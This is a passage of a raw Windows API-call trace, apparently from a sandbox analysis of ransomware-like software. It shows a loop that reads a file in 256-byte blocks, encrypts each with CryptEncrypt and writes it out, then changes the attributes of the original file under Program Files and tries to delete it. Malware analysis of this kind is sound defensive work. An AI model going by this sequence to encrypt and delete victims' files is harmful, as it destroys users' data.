[0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.754] GetLastError () returned 0x0 [0160.754] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.754] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.755] GetLastError () returned 0x0 [0160.755] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.755] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.756] GetLastError () returned 0x0 [0160.756] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.756] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.757] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.757] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.757] GetLastError () returned 0x0 [0160.757] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.758] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.758] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.758] GetLastError () returned 0x0 [0160.758] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.759] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.759] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui")) returned 0x20 [0160.759] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.759] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 1 [0160.759] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui")) returned 0 [0160.759] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" [0160.759] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS") returned 1 